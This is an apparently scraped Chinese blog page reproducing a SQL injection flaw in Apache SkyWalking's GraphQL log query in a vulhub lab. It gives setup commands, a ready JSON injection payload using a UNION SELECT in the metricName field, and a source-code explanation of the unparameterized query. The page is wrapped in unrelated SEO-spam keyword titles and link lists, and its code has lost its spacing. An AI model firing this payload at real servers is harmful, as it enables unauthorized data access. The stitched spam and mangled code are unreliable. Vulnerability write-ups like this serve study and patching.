当前位置: 首页 > news >正文

东营市做网站优化直通车优化推广

东营市做网站优化,直通车优化推广,网站建设空间是否续费,南宁太阳能网站建设漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参…

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

git clone https://github.com/vulhub/vulhub.git

搭建镜像

cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

在这里插入图片描述
访问8080端口
在这里插入图片描述

漏洞复现

在首页刷新即可抓到报文。
在这里插入图片描述

输入payload

{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}

查看返回结果
在这里插入图片描述
在这里插入图片描述

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0
graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{bookById(id: "book-1"){idnamepageCountauthor {firstNamelastName}}
}

则返回结果为:

{"bookById": {"id":"book-1","name":"Harry Potter and the Philosopher's Stone","pageCount":223,"author": {"firstName":"Joanne","lastName":"Rowling"}}
}

通常,graphql中会对对象类型进行定义:

type Query {bookById(id: ID): Book
}type Book {id: IDname: StringpageCount: Intauthor: Author
}type Author {id: IDfirstName: StringlastName: String
}

此次产生漏洞的queryLogs为:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:
(这里不知道为什么下载的源码中没有,只能跑到github上看)
在这里插入图片描述

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java
在这里插入图片描述

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java
在这里插入图片描述

采取了直接拼接的方式。

5、修复方法
修复后使用了占位符,即预编译。

http://www.khdw.cn/news/32273.html

相关文章:

  • adobe软件做网站的seo网站推广软件
  • 刘强东自己做网站best网络推广平台
  • 上海网站络公司百度指数怎样使用
  • 做网站的新闻sem工资
  • 网站建设推广唯心磁遁8站内营销推广方案
  • 广州网站设计公司兴田德润在那里最佳搜索引擎磁力
  • 网站外包 多少钱如何做网站推广广告
  • 青岛日文网站制作搜索引擎谷歌入口
  • 做网站买房可靠吗英雄联盟世界排名
  • logo图案生成器seo教学网站
  • 诗词门户网站今日国际新闻头条15条简短
  • 做垃圾网站 盈利小程序开发一个多少钱啊
  • 沈阳旅游集团网站建设百度网盘官方
  • 网站基本流程班级优化大师app下载学生版
  • 帮黄色网站做推广烟台网站建设
  • 最好的设计师网站百度如何发布作品
  • 上海网站备案注销百度百科合作模式
  • 担保公司网站模板品牌运营中心
  • 公司做网站图片google chrome download
  • 建设企业网站官网企业百度广告推广费用一年多少钱
  • 淘宝二官方网站是做啥的平台推广费用
  • 网站提交搜索引擎深圳sem竞价托管
  • 网站设计潮流长春网站制作系统
  • 做个自己的影院网站怎么做长沙网站关键词排名
  • 何苦做游戏网站中国企业网官方网站
  • 那家公司做网站企业网站营销优缺点
  • 专门做会议的网站so导航 抖音
  • 现在哪个网站可以做外贸百度联盟项目看广告挣钱
  • 简述一个网站开发流程手机广告推广软件
  • 网站站外引流怎么做教育培训机构加盟十大排名